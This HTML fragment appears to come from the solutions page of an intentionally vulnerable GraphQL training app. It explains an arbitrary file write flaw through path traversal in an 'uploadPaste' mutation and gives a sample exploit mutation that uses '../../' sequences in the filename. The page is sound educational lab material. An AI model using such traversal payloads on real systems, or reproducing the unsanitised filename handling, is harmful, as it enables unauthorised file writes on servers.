<!-- Start -->
<h3 style="color:purple" id="misc-filewrite"><b>Miscellaneous :: Arbitrary File Write // Path Traversal</b></h3>
<hr />
<h5>Problem Statement</h5>
<p>
  The mutation <code>uploadPaste</code> allows uploading pastes from the user's computer by specifying the file along
  with the filename. The pastes are then stored on the server under a dedicated folder. The <code>filename</code>
  argument allows any string, effectively providing the ability to write the file to any location on the server's
  filesystem by traversing folders using <code>../../</code>
</p>
<h5>Resources</h5>
<ul>
  <li>
    <a href="https://owasp.org/www-community/attacks/Path_Traversal" target="_blank">
      <i class="fa fa-newspaper"></i> OWASP - Path Traversal
    </a>
  </li>
</ul>
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-misc-filewrite')">Show</button></h5>
<div id="sol-misc-filewrite" style="display:none">
  <pre class="bash">
# Traverse the filesystem and place the file where you desire.
mutation {
  uploadPaste(filename:"../../../../../tmp/file.txt", content:"hi"){
    result
  }
}</pre>
</div>
<!-- End -->